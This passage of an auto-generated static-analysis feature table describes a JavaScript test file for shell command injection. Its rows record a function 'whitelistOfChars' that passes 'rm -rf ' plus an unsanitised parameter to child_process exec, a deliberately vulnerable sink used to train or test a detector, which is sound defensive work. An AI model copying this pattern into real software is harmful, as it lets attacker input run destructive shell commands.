name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | return of anonymous function | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:35:214:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:206:45:206:48 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:3 | cp | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:3 | cp | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:8 | cp.exec | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:5:207:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:5:207:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:5:207:8 | exec | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:5:207:8 | exec | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:5:207:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:18 | "rm -rf " | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:10:207:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:22:207:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:22:207:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:22:207:25 | name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:22:207:25 | name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:22:207:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:22:207:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:26 | /^[A-Za ... /:=-]$/ | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:26 | /^[A-Za ... /:=-]$/ | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:26 | /^[A-Za ... /:=-]$/ | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:26 | /^[A-Za ... /:=-]$/ | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:26 | /^[A-Za ... /:=-]$/ | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:31 | /^[A-Za ... $/.test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:31 | /^[A-Za ... $/.test | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:31 | /^[A-Za ... $/.test | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:31 | /^[A-Za ... $/.test | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:31 | /^[A-Za ... $/.test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | exceptional return of /^[A-Za ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 